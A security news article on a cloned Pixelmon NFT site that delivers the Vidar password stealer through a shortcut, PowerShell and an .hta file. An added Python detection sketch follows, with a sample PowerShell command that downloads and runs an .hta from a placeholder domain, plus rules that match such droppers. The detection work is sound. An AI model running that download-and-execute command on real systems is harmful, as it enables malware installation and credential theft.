Scam Pixelmon NFT Website Hosts Password-stealing Malware
A fraudulent website mimicking the popular Pixelmon NFT project lures visitors with promises of free collectibles and tokens, only to have them download and install password-stealing malware.
Pixelmon is an NFT project that has garnered a significant fanbase, counting almost 200 thousand followers on Twitter and more than 25,000 Discord members. Its popularity stems from the project's promising roadmap, which includes developing an online game in the metaverse where players can collect, train, and use Pixelmon pets to battle other players.
In this recent scam attempt, threat actors have created a copy of the original website and used it to host password-stealing malware that would drain the victims' cryptocurrency wallets. The perpetrators paid great attention to detail and replicated the website almost identically.
However, instead of providing visitors with links to a demo version of the game, the faux Pixelmon website hosts malicious executables that deploy password-stealing malware on infected devices. To be compromised, users would need to download a malicious archive that packs a Windows shortcut.
Opening the Windows shortcut (setup.lnk) triggers a PowerShell script that downloads a System32.hta file from the fake Pixelmon website. As BleepingComputer reported, the System32.hta file in turn retrieves Vidar, a password-stealing malware spotted in similar attacks in the past.
Once running, Vidar connects to a Telegram channel, retrieves the IP address of its command-and-control (C2) server, then downloads additional configuration files and modules to steal data from compromised systems. Vidar can search for relevant files on infected devices, exfiltrate them to the address defined by the threat actor, and steal passwords from apps and browsers.
This malware explicitly targets text files, crypto wallets, authentication and password files, and backups and codes. As Pixelmon is an NFT site, threat actors expect visitors to have cryptocurrency wallets installed on their systems.
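The infection chain described above (shortcut launches PowerShell, PowerShell fetches an .hta file, mshta.exe runs it) leaves a recognizable trail in process-creation telemetry. The following detection sketch is an added example and not code from the article or from Bitdefender; it runs two rules over constructed Sysmon-style process events. The lookalike domain, file paths and rule names are placeholders invented for the example.

```python
"""
Detection sketch for the Pixelmon-style infection chain: a Windows shortcut
starts PowerShell, PowerShell downloads an .hta file, and mshta.exe executes it.
Added example; the events below are constructed, and the download domain is a
placeholder rather than the real scam site.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal subset of the fields a Sysmon Event ID 1 (process create) carries."""
    parent_image: str
    image: str
    command_line: str


# Constructed sample telemetry (placeholder domain and paths).
SAMPLE_EVENTS = [
    ProcessEvent(
        "explorer.exe", "powershell.exe",
        "powershell.exe -w hidden -c \"Invoke-WebRequest -Uri "
        "https://pixelmon-lookalike.example/System32.hta -OutFile "
        "$env:TEMP\\System32.hta; Start-Process mshta $env:TEMP\\System32.hta\"",
    ),
    ProcessEvent(
        "powershell.exe", "mshta.exe",
        "mshta.exe C:\\Users\\victim\\AppData\\Local\\Temp\\System32.hta",
    ),
    # Benign activity that must not fire.
    ProcessEvent("explorer.exe", "powershell.exe",
                 "powershell.exe -File C:\\scripts\\backup.ps1"),
    ProcessEvent("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
]

# PowerShell download primitives commonly seen in one-liner droppers.
DOWNLOAD_RE = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadfile|downloadstring|"
    r"start-bitstransfer|\bcurl\b|\bwget\b)", re.I)
HTA_RE = re.compile(r"\.hta\b", re.I)
# Script hosts that should rarely be the parent of mshta.exe on a workstation.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
USER_WRITABLE_RE = re.compile(r"\\(temp|appdata|downloads)\\", re.I)


def rule_powershell_downloads_hta(ev: ProcessEvent) -> bool:
    """PowerShell launched from the shell (as a .lnk would do) that downloads an .hta."""
    return (ev.image.lower() == "powershell.exe"
            and ev.parent_image.lower() == "explorer.exe"
            and bool(DOWNLOAD_RE.search(ev.command_line))
            and bool(HTA_RE.search(ev.command_line)))


def rule_suspicious_mshta(ev: ProcessEvent) -> bool:
    """mshta.exe spawned by a script host, or running an .hta from a user-writable directory."""
    if ev.image.lower() != "mshta.exe":
        return False
    from_script_host = ev.parent_image.lower() in SCRIPT_HOSTS
    hta_in_user_dir = bool(HTA_RE.search(ev.command_line)) and bool(
        USER_WRITABLE_RE.search(ev.command_line))
    return from_script_host or hta_in_user_dir


RULES = {
    "powershell_downloads_hta": rule_powershell_downloads_hta,
    "suspicious_mshta": rule_suspicious_mshta,
}


def detect(events):
    """Return one finding per (rule, event) pair that matches, in event order."""
    findings = []
    for idx, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                findings.append({"rule": name, "index": idx, "image": ev.image})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f['rule']}] event {f['index']}: {f['image']}")
```

Both rules fire on the two constructed events that mirror the chain and stay silent on the benign PowerShell backup script and the service host. In production the same logic would sit in a SIEM query keyed on Sysmon or EDR process-creation events, and the second rule is the more durable one: an .hta executed from a temp directory by a script host is unusual regardless of which site served it.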
To steer clear of this type of attack, users should always pay attention to the website's URL, use only official links, avoid downloading content from unknown or untrusted websites, and use dedicated solutions to scan downloaded files for suspicious content.